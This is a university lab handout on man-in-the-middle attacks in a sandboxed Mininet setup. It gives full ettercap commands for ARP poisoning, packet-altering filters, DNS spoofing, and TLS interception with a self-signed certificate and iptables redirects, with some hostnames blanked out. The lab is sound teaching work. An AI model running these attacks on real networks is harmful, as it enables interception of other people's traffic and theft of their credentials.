Lab04. Man-in-the-middle attack

Important read to be graded!

Use OpenStack CDCI template to start a new VM. To access the VM, login to using your UPB credentials, and from there ssh into the private IP from OpenStack using “ubuntu” as a username and your ssh key.

Due to the fact that we have to work remote, please make sure that you record your screen while working. Here is how.

# start the recording after you ssh into the machine
ubuntu@cdci-v2:~/cdci/labs/lab03$ asciinema rec lab03_mihai.cast
# !!!IMPORTANT before you start working echo your name in the terminal!!!
ubuntu@cdci-v2:~/cdci/labs/lab03$ echo "Mihai Chiroiu's terminal!"
# ============ IMPORTANT ============
# do the tasks: enter docker
ubuntu@cdci-v2:~/cdci/labs/lab03$ ./ 
root@attacker:/# pwd
root@attacker:/# exit
# exited docker
# stop recording 
ubuntu@cdci-v2:~/cdci/labs/lab03$ exit
asciinema: recording finished
asciinema: press <enter> to upload to, <ctrl-c> to save locally

View the recording at:

# the IP of server has changed, sorry
ubuntu@cdci-v2:~/cdci/labs/lab03$ sudo echo "" > /etc/hosts
# upload the recording
ubuntu@cdci-v2:~/cdci/labs/lab03$ asciinema upload lab03_mihai.cast

When you finish your work, submit the details on the form . Double check to see if all is good (


  • MITM using ettercap tool
  • Wireshark usage for protocol dissection - DNS
  • Understanding attacks on ARP
  • Learning different types of MITM



01. [5p] Virtual machine setup

First, make sure that your virtual machine is updated (run the provided script, or create one).

Next, in one terminal start the provided Mininet topology.

root@cdci:/# cd cdci/lab04
root@cdci:/# /usr/bin/python3

If there are any problems with starting the topology (if all is good you should see the Mininet prompt ”>”) use the given cleanup script and try to restart the topology.

02. [5p] Internet connectivity

Before you begin, make sure that you have Internet connectivity on all two nodes (attacker and victim). R1 should be the gateway for the Attacker and Victim. Write down the MAC and IP addresses of all 3 nodes (including the gateway). Use the provided scripts to access the nodes.

root@ip-172-30-0-165:/# ./ 

root@ip-172-30-0-165:/# ./ 

03. [30p] ARP poisoning MITM attack

The goal of this exercise is to pass all the victim's traffic through the attacker's machine. From the Attacker node start an ARP poisoning mitm attack against the Victim machine using ettercap tool. Use “ping” tool from Victim and make sure that all traffic (including to outside) goes through the Attacker’s node (use extra verbose option for ettercap).

Make sure that you enable remote sniffing. To exit ettercap simply press Q.

Use tcpdump to save all the traffic from the victim and analyze it using Wireshark. Try to answer the following questions:

  • Can you spot the Gratuitous ARP packet sent when infecting the victim?
  • Look into the layer 2 of the packets and see how the destination MAC address has changed under the attack.
  • Can you spot the Gratuitous ARP packet when the infection is stopped?
root@attacker:/# ettercap -E -T -M ARP:remote / /

ettercap 0.8.3 copyright 2001-2019 Ettercap Development Team

Listening on:
attacker-eth0 -> FE:14:85:E7:5F:D0
* |==================================================>| 100.00 %

Sat Mar 14 20:39:26 2020 [835705]
D2:5D:2C:AD:D4:F5 --> FE:14:85:E7:5F:D0 --> | P (0)
root@attacker:/# tcpdump -n -i Attacker-eth0 -w mitm.pcap

04. [10p] Traffic dissection

Investigate the following traffic as it is generated by the Victim node:

  • HTTP and DNS while under MITM attack. Can you use Wireshark and rebuild/export the HTML pages that the victim opened (use wget or curl)?.

Transfer the pcap file to your local computer and open it in wireshark. Then select File→Export HTML Objects.

05. [20p] Raw packets altering

Ettercap filters can also be used to modify packets as they pass through the attacker’s node. Use the provided filter to change icmp type from echo to reply (Hint:

  • You should observe the changes on the victim (no more replies).
  • Use tcpdump on the attacker to inspect the changes.

cat icmp.filter
if (ip.proto == ICMP) {
   msg("Changing ICMP type!\n");
  replace("", "");
etterfilter icmp.filter -o icmp.ef
cat icmp.filter
if (ip.proto == ICMP && icmp.type == 0) {
  msg("Changing address!\n");
  icmp.type = 8;
etterfilter icmp.filter -o icmp.ef
ettercap -T -F icmp.ef -M ARP:remote / /

06. [10p] DNS traffic altering

Another interesting plugin of Ettercap is DNS spoofing. Config it such that any queries for the “” domain name are translated into “”.

root@attacker:~# cat /etc/ettercap/etter.dns A 
root@attacker:/# ettercap -P dns_spoof -E -T -M ARP:remote / /

Listening on:
attacker-eth0 -> 1E:D4:8A:37:43:CD
* |==================================================>| 100.00 %
Activating dns_spoof plugin...

Sat Mar 14 21:22:44 2020 [161164]
CE:82:B8:0E:6B:72 --> 1E:D4:8A:37:43:CD
UDP --> |  (34) A [] spoofed to [] TTL [3600 s]

root@victim:/# nslookup
Non-authoritative answer:	canonical name =
root@victim:/# nslookup

07. [20p] HTTPS traffic inspection

Unfortunately, HTTPS traffic cannot be inspected, or can it :). We will try to use ettercap and observe changes in the certificate chain when MITM attack is active.

  • First, use the “openssl s_client” tool (or other) to see the certificates path for the “” website.
     root@victim:~# openssl s_client -showcerts
    depth=2 OU = GlobalSign Root CA - R2, O = GlobalSign, CN = GlobalSign
    verify return:1
    depth=1 C = US, O = Google Trust Services, CN = GTS CA 1O1
    verify return:1
    depth=0 C = US, ST = California, L = Mountain View, O = Google LLC, CN =
    verify return:1
  • Next, run ettercap without TLS MITM (-S).
  • Now, run ettercap including TLS MITM.

For the TLS MITM you will require a certificate and a private key to be used when running ettercap (hint: --certificate). Use the following code to create the private key and certificate.

root@attacker:~# openssl genrsa -out hacker.pem 2048
root@attacker:~# openssl req -x509 -new -key hacker.pem -sha256 -days 365 -out hacker.crt 

For the MITM TLS attack we have to allow ettercap to run as root user and enable iptables configurations. This is required to allow ettercap SSL filter to receive and decode the TLS traffic. Modify the configuration file, “/etc/ettercap/etter.conf”, with the following.

ec_uid = 0
ec_gid = 0
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir6_command_on = "ip6tables -t nat -A PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport"
redir6_command_off = "ip6tables -t nat -D PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport"

root@attacker:~# ettercap -E -T -M ARP:remote --private-key hacker.pem --certificate hacker.crt / / 

root@victim:~# openssl s_client -showcerts
depth=0 C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
verify error:num=18:self signed certificate
verify return:1
depth=0 C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
verify return:1
cdci/labs/4.txt · Last modified: 2020/05/15 17:07 by mihai.chiroiu
CC Attribution-Share Alike 3.0 Unported Valid CSS Driven by DokuWiki do yourself a favour and use a real browser - get firefox!! Recent changes RSS feed Valid XHTML 1.0